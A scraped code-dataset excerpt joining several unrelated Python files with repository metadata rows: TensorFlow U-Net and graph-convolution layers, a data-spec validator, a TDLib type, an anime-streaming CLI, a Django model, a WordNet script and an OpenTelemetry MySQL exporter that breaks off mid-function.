            wx = tf.expand_dims(tf.subtract(indices[:,:,0], x1), -1)
            wx2 = tf.expand_dims(tf.subtract(x2, indices[:,:,0]), -1)
            lerp_x1 = tf.add(tf.multiply(q21, wx), tf.multiply(q11, wx2))
            lerp_x2 = tf.add(tf.multiply(q22, wx), tf.multiply(q12, wx2))
            wy = tf.expand_dims(tf.subtract(indices[:,:,1], y1), -1)
            wy2 = tf.expand_dims(tf.subtract(y2, indices[:,:,1]), -1)
            lerp_y1 = tf.add(tf.multiply(lerp_x2, wy), tf.multiply(lerp_x1, wy2))
            # z2 plane.
            q11 = gather_nd(features[i], tf.cast(tf.stack([x1, y1, z2], axis=-1), tf.int32))
            q21 = gather_nd(features[i], tf.cast(tf.stack([x2, y1, z2], axis=-1), tf.int32))
            q12 = gather_nd(features[i], tf.cast(tf.stack([x1, y2, z2], axis=-1), tf.int32))
            q22 = gather_nd(features[i], tf.cast(tf.stack([x2, y2, z2], axis=-1), tf.int32))
            lerp_x1 = tf.add(tf.multiply(q21, wx), tf.multiply(q11, wx2))
            lerp_x2 = tf.add(tf.multiply(q22, wx), tf.multiply(q12, wx2))
            lerp_y2 = tf.add(tf.multiply(lerp_x2, wy), tf.multiply(lerp_x1, wy2))
            # Interpolate between the two planes along z, then append.
            wz = tf.expand_dims(tf.subtract(indices[:,:,2], z1), -1)
            wz2 = tf.expand_dims(tf.subtract(z2, indices[:,:,2]),-1)
            lerp_z = tf.add(tf.multiply(lerp_y2, wz), tf.multiply(lerp_y1, wz2))
            out = tf.concat([out, lerp_z], axis=-1)
        # Re-pack per-point features back into the original packed layout.
        out = tf.reshape(out, [mesh_shape[0], mesh_shape[1], out.get_shape().as_list()[-1]*(mesh_shape[2]//3)])
        return out
class GraphConv(layers.Layer):
    """Graph convolution with Chebyshev-style supports: one kernel per
    adjacency/support matrix in ``adjs``; outputs sum over supports, plus an
    optional bias, passed through ``act``.
    """
    def __init__(self, input_dim=10, output_dim=10, adjs=None, dropout=False,
                 sparse_inputs=False, act=tf.nn.relu, bias=True,
                 featureless=False, **kwargs):
        super(GraphConv, self).__init__(**kwargs)
        self.input_dim = input_dim
        self.output_dim = output_dim
        self.bias = bias
        self.dropout = dropout
        self.sparse_inputs = sparse_inputs
        self.act = act
        self.featureless = featureless
        self.vars = {}
        self.adjs = adjs
    def get_config(self):
        config = {'input_dim': self.input_dim,
                  'output_dim': self.output_dim,
                  'adjs': self.adjs,
                  'dropout':self.dropout,
                  'sparse_inputs': self.sparse_inputs,
                  'act': self.act,
                  'bias':self.bias,
                  'featureless': self.featureless}
        base_config = super(GraphConv, self).get_config()
        return dict(list(base_config.items()) + list(config.items()))
    def build(self, input_shape):
        # One (input_dim, output_dim) kernel per support matrix.
        self.batch_size = input_shape[0]
        num_cheb_support = len(self.adjs)
        for i in range(1, num_cheb_support+1):
            name = 'kernel_'+str(i)
            self.vars[name] = self.add_weight(name=name,
                                              shape=(self.input_dim, self.output_dim),
                                              initializer='glorot_normal',
                                              regularizer=regularizers.l2(0.01),
                                              trainable=True)
        # Bug fix: shape was written as `( self.output_dim)`, which is just
        # an int, not a 1-tuple; add_weight expects an iterable shape.
        self.vars['bias'] = self.add_weight(name='bias',
                                            shape=(self.output_dim,),
                                            initializer='zeros',
                                            trainable=True)
        super(GraphConv, self).build(input_shape)  # Be sure to call this at the end
    def call(self, x):
        # Sum of (adj_k @ (x @ W_k)) over every support matrix.
        support_1 = dot(x, self.vars['kernel_1'], sparse=self.sparse_inputs)
        output = dot(self.adjs[0], support_1, sparse=True)
        for i in range(2, len(self.adjs)+1):
            name = 'kernel_'+str(i)
            support = dot(x, self.vars[name], sparse=self.sparse_inputs)
            output = output + dot(self.adjs[i-1], support, sparse=True)
        if self.bias:
            output += self.vars['bias']
        return self.act(output)
    def compute_output_shape(self, input_shape):
        # Bug fix: tf.identity() converts the shape to a Tensor, which does
        # not support item assignment; copy to a list instead.
        output_shape = list(input_shape)
        output_shape[-1] = self.output_dim
        return tuple(output_shape)
from tensorflow.python.keras.layers import Layer, InputSpec
from tensorflow.python.keras import initializers, regularizers, constraints
class InstanceNormalization(layers.Layer):
    """Instance normalization layer. Taken from keras.contrib
    Normalize the activations of the previous layer at each step,
    i.e. applies a transformation that maintains the mean activation
    close to 0 and the activation standard deviation close to 1.
    # Arguments
        axis: Integer, the axis that should be normalized
            (typically the features axis).
            For instance, after a `Conv2D` layer with
            `data_format="channels_first"`,
            set `axis=1` in `InstanceNormalization`.
            Setting `axis=None` will normalize all values in each
            instance of the batch.
            Axis 0 is the batch dimension. `axis` cannot be set to 0 to avoid errors.
        epsilon: Small float added to variance to avoid dividing by zero.
        center: If True, add offset of `beta` to normalized tensor.
            If False, `beta` is ignored.
        scale: If True, multiply by `gamma`.
            If False, `gamma` is not used.
            When the next layer is linear (also e.g. `nn.relu`),
            this can be disabled since the scaling
            will be done by the next layer.
        beta_initializer: Initializer for the beta weight.
        gamma_initializer: Initializer for the gamma weight.
        beta_regularizer: Optional regularizer for the beta weight.
        gamma_regularizer: Optional regularizer for the gamma weight.
        beta_constraint: Optional constraint for the beta weight.
        gamma_constraint: Optional constraint for the gamma weight.
    # Input shape
        Arbitrary. Use the keyword argument `input_shape`
        (tuple of integers, does not include the samples axis)
        when using this layer as the first layer in a Sequential model.
    # Output shape
        Same shape as input.
    # References
        - [Layer Normalization](https://arxiv.org/abs/1607.06450)
        - [Instance Normalization: The Missing Ingredient for Fast Stylization](
        https://arxiv.org/abs/1607.08022)
    """
    def __init__(self,
                 axis=None,
                 epsilon=1e-3,
                 center=True,
                 scale=True,
                 beta_initializer='zeros',
                 gamma_initializer='ones',
                 beta_regularizer=None,
                 gamma_regularizer=None,
                 beta_constraint=None,
                 gamma_constraint=None,
                 **kwargs):
        super(InstanceNormalization, self).__init__(**kwargs)
        self.supports_masking = True
        self.axis = axis
        self.epsilon = epsilon
        self.center = center
        self.scale = scale
        # Resolve string identifiers to initializer/regularizer/constraint
        # objects up front so get_config can serialize them back.
        self.beta_initializer = initializers.get(beta_initializer)
        self.gamma_initializer = initializers.get(gamma_initializer)
        self.beta_regularizer = regularizers.get(beta_regularizer)
        self.gamma_regularizer = regularizers.get(gamma_regularizer)
        self.beta_constraint = constraints.get(beta_constraint)
        self.gamma_constraint = constraints.get(gamma_constraint)
    def build(self, input_shape):
        ndim = len(input_shape)
        # Normalizing over the batch axis would mix samples.
        if self.axis == 0:
            raise ValueError('Axis cannot be zero')
        # A rank-2 input has only batch + features, so a feature axis
        # would leave nothing to normalize over.
        if (self.axis is not None) and (ndim == 2):
            raise ValueError('Cannot specify axis for rank 1 tensor')
        self.input_spec = InputSpec(ndim=ndim)
        # gamma/beta are scalars when normalizing everything, or one value
        # per channel when a feature axis is given.
        if self.axis is None:
            shape = (1,)
        else:
            shape = (input_shape[self.axis],)
        if self.scale:
            self.gamma = self.add_weight(shape=shape,
                                         name='gamma',
                                         initializer=self.gamma_initializer,
                                         regularizer=self.gamma_regularizer,
                                         constraint=self.gamma_constraint)
        else:
            self.gamma = None
        if self.center:
            self.beta = self.add_weight(shape=shape,
                                        name='beta',
                                        initializer=self.beta_initializer,
                                        regularizer=self.beta_regularizer,
                                        constraint=self.beta_constraint)
        else:
            self.beta = None
        self.built = True
    def call(self, inputs, training=None):
        input_shape = K.int_shape(inputs)
        # Reduce over every axis except the batch axis and (if set) the
        # feature axis -- i.e. per-instance statistics.
        reduction_axes = list(range(0, len(input_shape)))
        if self.axis is not None:
            del reduction_axes[self.axis]
        del reduction_axes[0]
        mean = K.mean(inputs, reduction_axes, keepdims=True)
        stddev = K.std(inputs, reduction_axes, keepdims=True) + self.epsilon
        normed = (inputs - mean) / stddev
        # Reshape gamma/beta so they broadcast along the feature axis only.
        broadcast_shape = [1] * len(input_shape)
        if self.axis is not None:
            broadcast_shape[self.axis] = input_shape[self.axis]
        if self.scale:
            broadcast_gamma = K.reshape(self.gamma, broadcast_shape)
            normed = normed * broadcast_gamma
        if self.center:
            broadcast_beta = K.reshape(self.beta, broadcast_shape)
            normed = normed + broadcast_beta
        return normed
    def get_config(self):
        config = {
            'axis': self.axis,
            'epsilon': self.epsilon,
            'center': self.center,
            'scale': self.scale,
            'beta_initializer': initializers.serialize(self.beta_initializer),
            'gamma_initializer': initializers.serialize(self.gamma_initializer),
            'beta_regularizer': regularizers.serialize(self.beta_regularizer),
            'gamma_regularizer': regularizers.serialize(self.gamma_regularizer),
            'beta_constraint': constraints.serialize(self.beta_constraint),
            'gamma_constraint': constraints.serialize(self.gamma_constraint)
        }
        base_config = super(InstanceNormalization, self).get_config()
        return dict(list(base_config.items()) + list(config.items()))
class ConvBlock(layers.Layer):
    """Two (Conv3D 3x3x3 -> BatchNorm -> ReLU) stages with `num_filters`
    filters each; the ReLU activation object is shared between stages.
    """
    def __init__(self, num_filters):
        super(ConvBlock, self).__init__()
        self.conv_3d = layers.Conv3D(num_filters, (3, 3, 3), padding='same')
        self.conv_3d_2 = layers.Conv3D(num_filters, (3, 3, 3), padding='same')
        self.batch_norm = layers.BatchNormalization()
        self.batch_norm_2 = layers.BatchNormalization()
        self.activation = layers.Activation('relu')
    def call(self, inputs):
        encoder = self.conv_3d(inputs)
        encoder = self.batch_norm(encoder)
        encoder = self.activation(encoder)
        encoder = self.conv_3d_2(encoder)
        encoder = self.batch_norm_2(encoder)
        return self.activation(encoder)
class EncoderBlock(layers.Layer):
    """ConvBlock followed by 2x2x2 max-pooling; returns both the pooled
    output (for the next level) and the pre-pool features (for skip links).
    """
    def __init__(self, num_filters):
        super(EncoderBlock, self).__init__()
        self.conv_block = ConvBlock(num_filters)
        self.pool = layers.MaxPooling3D((2, 2, 2), strides=(2,2,2))
    def call(self, inputs):
        encoder = self.conv_block(inputs)
        return [self.pool(encoder), encoder]
class DecoderBlock(layers.Layer):
    """U-Net decoder stage: transposed-conv upsampling, concatenation with
    the matching encoder skip features, then two conv stages (each with
    half of `num_filters`) with BatchNorm + ReLU.
    """
    def __init__(self, num_filters):
        super(DecoderBlock, self).__init__()
        self.convT = layers.Conv3DTranspose(num_filters, (2, 2, 2), strides=(2, 2, 2), padding='same')
        self.conv2 = layers.Conv3D(int(num_filters/2), (3, 3, 3), padding='same')
        self.conv1 = layers.Conv3D(int(num_filters/2), (3, 3, 3), padding='same')
        self.concate = layers.Concatenate(axis=-1)
        self.batch_norm = layers.BatchNormalization()
        self.batch_norm_2 = layers.BatchNormalization()
        self.batch_norm_3 = layers.BatchNormalization()
        self.activation = layers.Activation('relu')
    def call(self, inputs):
        # inputs = [skip features from the encoder, output of previous stage].
        features, encoder_out = inputs
        decoder_out = self.convT(encoder_out)
        decoder_out = self.concate([decoder_out, features])
        decoder_out = self.activation(self.batch_norm(decoder_out))
        decoder_out = self.activation(self.batch_norm_2(self.conv2(decoder_out)))
        decoder_out = self.activation(self.batch_norm_3(self.conv1(decoder_out)))
        return decoder_out
class UnetEncoder(layers.Layer):
    """3-level U-Net encoder (32/64/128 filters) plus a 256-filter center
    block; returns all skip features and the center output.
    """
    def __init__(self):
        super(UnetEncoder, self).__init__()
        self.block1 = EncoderBlock(32)
        self.block2 = EncoderBlock(64)
        self.block3 = EncoderBlock(128)
        self.center = ConvBlock(256)
    def call(self, inputs):
        encoder0_pool, encoder0= self.block1(inputs)
        encoder1_pool, encoder1 = self.block2(encoder0_pool)
        encoder2_pool, encoder2 = self.block3(encoder1_pool)
        center = self.center(encoder2_pool)
        return [encoder0, encoder1, encoder2, center]
class UNetDecoder(layers.Layer):
    """3-level U-Net decoder (512/256/128 filters) ending in a 1x1x1 softmax
    convolution over `num_class` channels.
    """
    def __init__(self, num_class):
        super(UNetDecoder, self).__init__()
        self.block1 = DecoderBlock(512)
        self.block2 = DecoderBlock(256)
        self.block3 = DecoderBlock(128)
        self.conv = layers.Conv3D(num_class, (1,1,1), activation='softmax', data_format="channels_last")
    def call(self, inputs):
        # inputs mirror UnetEncoder's outputs: skips (shallow->deep) + center.
        encoder0, encoder1, encoder2, center = inputs
        decoder0 = self.block1([encoder2, center])
        decoder1 = self.block2([encoder1, decoder0])
        decoder2 = self.block3([encoder0, decoder1])
        output = self.conv(decoder2)
        return output
| 45.579353 | 137 | 0.61837 | 27,485 | 0.929144 | 0 | 0 | 0 | 0 | 0 | 0 | 4,693 | 0.158649 |
33e320a31c348ff9ae4c6582aaca0b0e10833e86 | 2,455 | py | Python | data_spec_validator/spec/actions.py | travisliu/data-spec-validator | 7ee0944ca9899d565ad04ed82ca26bb402970958 | [
"MIT"
] | 23 | 2021-08-11T08:53:15.000Z | 2022-02-14T04:44:13.000Z | data_spec_validator/spec/actions.py | travisliu/data-spec-validator | 7ee0944ca9899d565ad04ed82ca26bb402970958 | [
"MIT"
] | 2 | 2021-09-11T08:59:12.000Z | 2022-03-29T00:40:42.000Z | data_spec_validator/spec/actions.py | travisliu/data-spec-validator | 7ee0944ca9899d565ad04ed82ca26bb402970958 | [
"MIT"
] | 1 | 2022-01-04T07:45:22.000Z | 2022-01-04T07:45:22.000Z | from .defines import MsgLv, UnknownFieldValue, ValidateResult, get_msg_level
from .validators import SpecValidator
def _wrap_error_with_field_info(failure):
    """Wrap a ValidateResult's error in an exception that names the field.
    In VAGUE message mode every detail is hidden behind a generic
    RuntimeError; a missing field (UnknownFieldValue) becomes a LookupError;
    otherwise the original error type is preserved with the field prepended.
    """
    if get_msg_level() == MsgLv.VAGUE:
        return RuntimeError(f'field: {failure.field} not well-formatted')
    if isinstance(failure.value, UnknownFieldValue):
        return LookupError(f'field: {failure.field} missing')
    msg = f'field: {failure.field}, reason: {failure.error}'
    # Re-create the same exception type with the enriched message.
    return type(failure.error)(msg)
def _flatten_results(failures, errors=None):
if type(errors) != list:
raise RuntimeError(f'{errors} not a list')
if type(failures) == tuple:
_flatten_results(failures[1], errors)
elif type(failures) == list:
for item in failures:
_flatten_results(item, errors)
elif isinstance(failures, ValidateResult):
if issubclass(type(failures.error), Exception):
error = _wrap_error_with_field_info(failures)
errors.append(error)
return
_flatten_results(failures.error, errors)
def _find_most_significant_error(failures):
    """Flatten ``failures`` and return the single most severe wrapped error."""
    collected = []
    _flatten_results(failures, collected)
    # Bucket each error under its first matching category; the check order
    # matters because some exception types overlap.
    categories = (
        (ValueError, 'ValueError'),
        (PermissionError, 'PermissionError'),
        (TypeError, 'TypeError'),
        (LookupError, 'LookupError'),
    )
    err_map = {}
    for err in collected:
        for err_cls, err_key in categories:
            if isinstance(err, err_cls):
                break
        else:
            err_key = 'RuntimeError'
        err_map.setdefault(err_key, []).append(err)
    # Severity, PermissionError > LookupError > TypeError > ValueError > RuntimeError.
    ranked = (
        err_map.get('PermissionError', [])
        or err_map.get('LookupError', [])
        or err_map.get('TypeError', [])
        or err_map.get('ValueError', [])
        or err_map.get('RuntimeError', [])
    )
    # TODO: For better information, we can raise an error with all error messages at one shot
    return ranked[0]
def validate_data_spec(data, spec, **kwargs):
    """Validate ``data`` against ``spec``.
    Keyword args:
        nothrow (bool): when True, return the boolean result instead of
            raising on failure. Defaults to False.
    Returns the boolean validation result; raises the most significant
    wrapped error when validation fails and ``nothrow`` is falsy.
    """
    # SPEC validator as the root validator
    ok, failures = SpecValidator.validate(data, {SpecValidator.name: spec}, None)
    nothrow = kwargs.get('nothrow', False)
    if not ok and not nothrow:
        error = _find_most_significant_error(failures)
        raise error
    return ok
| 34.097222 | 93 | 0.657434 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 534 | 0.217515 |
33e48de23ace5856239e5367cf22a81d72e55b3b | 290 | py | Python | hwtypes/compatibility.py | splhack/hwtypes | aee03c086226fa3ed5892c998603cb8477e15f5e | [
"BSD-3-Clause"
] | 167 | 2017-10-08T00:59:22.000Z | 2022-02-08T00:14:39.000Z | hwtypes/compatibility.py | splhack/hwtypes | aee03c086226fa3ed5892c998603cb8477e15f5e | [
"BSD-3-Clause"
] | 719 | 2017-08-29T17:58:28.000Z | 2022-03-31T23:39:18.000Z | hwtypes/compatibility.py | splhack/hwtypes | aee03c086226fa3ed5892c998603cb8477e15f5e | [
"BSD-3-Clause"
] | 14 | 2017-09-01T03:25:16.000Z | 2021-11-05T13:30:24.000Z | import sys
__all__ = ['IntegerTypes', 'StringTypes']
# Python 2 / 3 compatibility shim: expose tuples of the native integer and
# string types, a `long` alias, and the builtins module under one name.
if sys.version_info < (3,):
    # On Python 2, `long` and `unicode` are builtins (undefined on py3,
    # which is fine -- this branch never runs there).
    IntegerTypes = (int, long)
    StringTypes = (str, unicode)
    long = long
    import __builtin__ as builtins
else:
    IntegerTypes = (int,)
    StringTypes = (str,)
    long = int
    import builtins
| 19.333333 | 41 | 0.641379 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 27 | 0.093103 |
33e56033d7e024573e61a6a3dc78c7548534c357 | 285 | py | Python | py_tdlib/constructors/secret_chat.py | Mr-TelegramBot/python-tdlib | 2e2d21a742ebcd439971a32357f2d0abd0ce61eb | [
"MIT"
] | 24 | 2018-10-05T13:04:30.000Z | 2020-05-12T08:45:34.000Z | py_tdlib/constructors/secret_chat.py | MrMahdi313/python-tdlib | 2e2d21a742ebcd439971a32357f2d0abd0ce61eb | [
"MIT"
] | 3 | 2019-06-26T07:20:20.000Z | 2021-05-24T13:06:56.000Z | py_tdlib/constructors/secret_chat.py | MrMahdi313/python-tdlib | 2e2d21a742ebcd439971a32357f2d0abd0ce61eb | [
"MIT"
] | 5 | 2018-10-05T14:29:28.000Z | 2020-08-11T15:04:10.000Z | from ..factory import Type
class secretChat(Type):
    """TDLib ``secretChat`` object.
    Attributes default to None and are presumably filled in by the ``Type``
    base class during deserialization -- TODO confirm. The trailing
    ``# type:`` comments record the TDLib field types.
    """
    id = None # type: "int32"
    user_id = None # type: "int32"
    state = None # type: "SecretChatState"
    is_outbound = None # type: "Bool"
    ttl = None # type: "int32"
    key_hash = None # type: "bytes"
    layer = None # type: "int32"
| 23.75 | 40 | 0.635088 | 255 | 0.894737 | 0 | 0 | 0 | 0 | 0 | 0 | 114 | 0.4 |
33e70135430c756b9a90a2e67be6abde70c17fb4 | 100 | py | Python | paraVerComoFuncionaAlgumasCoisas/sqlite3/fazendoTeste/teste.py | jonasht/pythonEstudos | 5e7d28e7bd82b9d1b08e795867fdbaa743f4b747 | [
"MIT"
] | null | null | null | paraVerComoFuncionaAlgumasCoisas/sqlite3/fazendoTeste/teste.py | jonasht/pythonEstudos | 5e7d28e7bd82b9d1b08e795867fdbaa743f4b747 | [
"MIT"
] | null | null | null | paraVerComoFuncionaAlgumasCoisas/sqlite3/fazendoTeste/teste.py | jonasht/pythonEstudos | 5e7d28e7bd82b9d1b08e795867fdbaa743f4b747 | [
"MIT"
] | null | null | null | import PegandoVariavel as v
print(v.get_Pessoas())
print()
for d in v.get_Pessoas():
print(d) | 12.5 | 27 | 0.7 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
33e78a01265ca1d4db3cea8c8ee8b0a653ab15e6 | 2,689 | py | Python | main.py | Abrolhus/animeDlCLI | 4ba7fc4c24eb0b01a6352a1f6b011edee79b8ea3 | [
"MIT"
] | null | null | null | main.py | Abrolhus/animeDlCLI | 4ba7fc4c24eb0b01a6352a1f6b011edee79b8ea3 | [
"MIT"
] | null | null | null | main.py | Abrolhus/animeDlCLI | 4ba7fc4c24eb0b01a6352a1f6b011edee79b8ea3 | [
"MIT"
] | null | null | null | import click
from Crypto.Cipher import AES
import base64
from hashlib import md5
import warnings
import requests_cache
import requests
import logging
import subprocess
import tempfile
from anime_downloader.sites import get_anime_class
import util
@click.command()
@click.argument('name')
@click.option('-e', '--ep', default=1, help='episode')
@click.option('--provider', default='twist.moe', help='site to get animes from')
@click.option('--autoplay', is_flag=True, help='Autoplays next episode')
def hello(name, ep, provider, autoplay):
    """Search `provider` for an anime by NAME, build an m3u8 playlist of its
    episodes, and launch a media player (mpv) on it.
    NOTE(review): `autoplay` is accepted but never read in this body, and the
    commented-out blocks are leftover experiments kept for reference.
    """
    # Resolve the site-specific Anime class and take the first search hit.
    Anime = get_anime_class(provider)
    player = 'mpv'
    searchResults = Anime.search(name)
    # click.echo(searchResults)
    anime = Anime(searchResults[0].url)
    print(anime)
    # `ep` is 1-based on the CLI; anime[] indexing is 0-based.
    episode = anime[ep-1]
    episode2 = anime[ep]
    click.echo(episode.source().stream_url)
    #click.echo(episode2.source().stream_url)
    click.echo(episode.source().referer)
    # util.play_episode(episode, player=player, title=f'{anime.title} - Episode {episode.ep_no}')
    # title=f'{anime.title} - Episode {episode.ep_no}'
    # title2=f'{anime.title} - Episode {episode2.ep_no}'
    # p = subprocess.Popen([
    #     player,
    #     '--title={}'.format(title),
    #     '--referrer="{}"'.format(episode.source().referer),
    #     episode.source().stream_url,
    #     '--title={}'.format(title2),
    #     '--referrer="{}"'.format(episode2.source().referer),
    #     episode2.source().stream_url
    #     ])
    # Temporary playlist file handed to mpv via --playlist.
    tfile = tempfile.NamedTemporaryFile(mode='a+', suffix='.m3u8')
    mpvArgs = [player, '--referrer={}'.format('https://twist.moe/'), '--playlist']
    if player == 'mpv':
        # Seed the playlist with the first episode, start mpv, then append
        # the remaining episodes while the player is already running.
        util.makePlaylist(anime[0:1], tfile)
        # for epi in anime:
        #     title = f'{anime.title} - Episode {epi.ep_no}'
        #     mpvArgs += ['--title={}'.format(title),
        #             'ffmpeg://{}'.format(epi.source().stream_url)]
        #     click.echo("uai")
        print(tfile.name)
        mpvArgs.append(tfile.name)
        print(mpvArgs)
        tfile.seek(0)
        print(tfile.read())
        #mpvArgs.append('{0} >/dev/null 2>&1 &')
        #subprocess.Popen("nohup usr/local/bin/otherscript.pl {0} >/dev/null 2>&1 &", shell=True)
        print(''.join(mpvArgs))
        util.addAnimesToPlaylist(anime[1:], tfile)
        p = subprocess.Popen(mpvArgs, stdin=None, stdout=None, stderr=None)
        print("humm")
        print(anime[0:1])
        print(anime[1:])
        print("uaaaaaaaaaaaaaaaaaaaaaaaa");
        tfile.seek(0)
        print(tfile.read())
        p.wait()
    else:
        # Fallback: hand the single episode URL straight to the player.
        p = subprocess.Popen([player, episode.source().stream_url])
        p.wait()
# Script entry point: invoke the Click command-line interface.
if __name__ == "__main__":
    hello()
| 34.474359 | 97 | 0.613611 | 0 | 0 | 0 | 0 | 2,398 | 0.891781 | 0 | 0 | 1,052 | 0.391224 |
33e792cf546e5c419d580edda8137736596261a6 | 333 | py | Python | file_upload/address/models.py | pkscredy/lat_long | 1079d4c4eaf16a7df08c431aaa83eed188099af4 | [
"MIT"
] | null | null | null | file_upload/address/models.py | pkscredy/lat_long | 1079d4c4eaf16a7df08c431aaa83eed188099af4 | [
"MIT"
] | null | null | null | file_upload/address/models.py | pkscredy/lat_long | 1079d4c4eaf16a7df08c431aaa83eed188099af4 | [
"MIT"
] | null | null | null | from __future__ import unicode_literals
from django.db import models
class Document(models.Model):
    """An uploaded file together with its display name and upload time."""
    file_name = models.CharField(max_length=255, blank=True)
    document = models.FileField(upload_to='documents/')
    uploaded_at = models.DateTimeField(auto_now_add=True)
    def __str__(self):
        # Bug fix: the model has no `description` field, so the previous
        # `return self.description` raised AttributeError whenever the
        # object was rendered. Use the stored file name instead.
        return self.file_name
| 25.615385 | 60 | 0.756757 | 260 | 0.780781 | 0 | 0 | 0 | 0 | 0 | 0 | 12 | 0.036036 |
33e8f24130e48b94bffd6cb5db000655f6d2dde5 | 3,106 | py | Python | src/messages/results/base.py | rkulyn/telegram-dutch-taxbot | f6c2222e5f2b9f96d8e035e9d6f64c67da3a73e1 | [
"MIT"
] | 2 | 2020-02-27T13:15:07.000Z | 2020-09-19T15:19:29.000Z | src/messages/results/base.py | rkulyn/telegram-dutch-taxbot | f6c2222e5f2b9f96d8e035e9d6f64c67da3a73e1 | [
"MIT"
] | null | null | null | src/messages/results/base.py | rkulyn/telegram-dutch-taxbot | f6c2222e5f2b9f96d8e035e9d6f64c67da3a73e1 | [
"MIT"
] | null | null | null | import abc
from collections import OrderedDict
from .constants import RESULT_KEY_MAP
class ResultMessageBase(abc.ABC):
    """Abstract base for bot result messages.
    Subclasses supply the message content; ``get_options`` may be overridden
    to add extra send options.
    """
    @abc.abstractmethod
    def get_content(self, custom_data=None):
        """Return the message content dict built from ``custom_data``."""
        return {}
    def get_options(self):
        """Return extra message options (none by default)."""
        return {}
    @staticmethod
    def convert_result_to_readable(result):
        """Rename raw result keys via RESULT_KEY_MAP, preserving order and
        dropping keys without a mapping.
        """
        return OrderedDict(
            (RESULT_KEY_MAP[key], value)
            for key, value in result.items()
            if key in RESULT_KEY_MAP
        )
class FileResultMessageBase(ResultMessageBase):
    """Base class for results delivered as a document message."""
    @abc.abstractmethod
    def get_filename(self):
        """Return the filename attached to the outgoing document."""
        return "output"
    @abc.abstractmethod
    def get_document(self, data):
        """Build and return a file-like document from ``data`` (dict)."""
        return None
    def get_content(self, custom_data=None):
        """Assemble filename + document, then overlay any extra options."""
        base = {
            "filename": self.get_filename(),
            "document": self.get_document(custom_data or {}),
        }
        return {**base, **self.get_options()}
    def send(self, bot, chat_id, custom_data=None):
        """Send the built document message to ``chat_id`` via ``bot``."""
        payload = self.get_content(custom_data)
        bot.send_document(chat_id=chat_id, **payload)
class TextResultMessageBase(ResultMessageBase):
    """Base class for results delivered as a text message."""
    @abc.abstractmethod
    def get_text(self, data):
        """Build and return the message text from ``data`` (dict)."""
        return ""
    def get_content(self, custom_data=None):
        """Assemble the text payload, then overlay any extra options."""
        base = {"text": self.get_text(custom_data or {})}
        return {**base, **self.get_options()}
    def send(self, bot, chat_id, custom_data=None):
        """Send the built text message to ``chat_id`` via ``bot``."""
        payload = self.get_content(custom_data)
        bot.send_message(chat_id=chat_id, **payload)
| 20.168831 | 61 | 0.533162 | 3,010 | 0.969092 | 0 | 0 | 1,362 | 0.438506 | 0 | 0 | 1,466 | 0.47199 |
33ec942a5d39ab4de12cd3ad377092659ef39d3e | 377 | py | Python | extract_wn_synsets.py | napsternxg/WordNetExperiments | 6dd12604b3b1ae64d07b819745629074b9db993b | [
"Apache-2.0"
] | 2 | 2017-06-22T16:59:58.000Z | 2020-03-26T17:04:32.000Z | extract_wn_synsets.py | napsternxg/WordNetExperiments | 6dd12604b3b1ae64d07b819745629074b9db993b | [
"Apache-2.0"
] | null | null | null | extract_wn_synsets.py | napsternxg/WordNetExperiments | 6dd12604b3b1ae64d07b819745629074b9db993b | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
from nltk.corpus import wordnet as wn

# Collect every distinct WordNet synset reachable from any word.
all_synsets = set()
for word in wn.words():
    for synset in wn.synsets(word):
        all_synsets.add(synset)

# BUG FIX: the original used the Python-2 `print >> fp` statement and wrote
# text into a file opened in binary mode ('wb+'); both break on Python 3.
with open("wordnet_synset_definition.txt", "w", encoding="utf-8") as fp:
    for synset in all_synsets:
        print("%s\t%s" % (
            synset.name(),
            synset.definition()
        ), file=fp)
| 22.176471 | 56 | 0.570292 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 59 | 0.156499 |
33ed53521c15ad28a778f2b1528538b64f181026 | 32 | py | Python | week01/test_f.py | wasit7/cn350 | a84a6ed04ada532e0a12c69d705cf3c15d7e0240 | [
"MIT"
] | null | null | null | week01/test_f.py | wasit7/cn350 | a84a6ed04ada532e0a12c69d705cf3c15d7e0240 | [
"MIT"
] | null | null | null | week01/test_f.py | wasit7/cn350 | a84a6ed04ada532e0a12c69d705cf3c15d7e0240 | [
"MIT"
] | null | null | null | n=1
def f(x):
    """Print the module-level ``n``; the parameter ``x`` is unused.

    Demonstrates that name lookup falls back to the enclosing (global)
    scope when a name is not bound locally.
    """
    print(n)
f(0) | 6.4 | 12 | 0.46875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
33eef624cce407f1578fbc591f6a8b24eb12d230 | 2,047 | py | Python | otel_billing/otel_billing.py | rnishtala/otel_billing | 24f49458eb273d210f15c597953bd176a32f5e89 | [
"MIT"
] | null | null | null | otel_billing/otel_billing.py | rnishtala/otel_billing | 24f49458eb273d210f15c597953bd176a32f5e89 | [
"MIT"
] | null | null | null | otel_billing/otel_billing.py | rnishtala/otel_billing | 24f49458eb273d210f15c597953bd176a32f5e89 | [
"MIT"
] | null | null | null | """Main module."""
from sqlalchemy import create_engine
import pandas as pd
import collections
import logging
import re
from pprint import pprint
from typing import Sequence
from opentelemetry.metrics import Counter, Metric
from opentelemetry.sdk.metrics.export import (
MetricRecord,
MetricsExporter,
MetricsExportResult,
)
logger = logging.getLogger(__name__)
class FeatureMetricsExporter(MetricsExporter):
    """
    Feature Usage metrics exporter for OpenTelemetry.

    Writes each metric record as a row of the `feature_perf_data` MySQL
    table via SQLAlchemy/pandas.
    """
    def __init__(self):
        """
        Connect to the database.
        """
        # NOTE(review): credentials and host are hardcoded placeholders;
        # they should come from configuration or the environment.
        eng_str = 'mysql+mysqldb://{0}:{1}@{2}:7706/{3}'.format('***',
                                                                '***',
                                                                '10.2.1.43',
                                                                'subscriber_data')
        # pool_recycle avoids stale MySQL connections; echo logs SQL.
        self.engine = create_engine(eng_str, pool_recycle=60, echo=True)
    def export(
            self, metric_records: Sequence[MetricRecord]
    ) -> MetricsExportResult:
        """
        Persist every metric record.

        Returns FAILURE on the first insert error, SUCCESS once all
        records have been written (including the empty-input case).
        """
        for record in metric_records:
            print(
                '{}(feature_id="{}", performance_id="{}", value={})'.format(
                    type(self).__name__,
                    record.labels[0][1],
                    record.labels[1][1],
                    record.aggregator.checkpoint,
                )
            )
            df = pd.DataFrame({"feature_id": int(record.labels[0][1]),
                               "performance_id": int(record.labels[1][1]),
                               "data": record.aggregator.checkpoint}, index=["feature_id"])
            try:
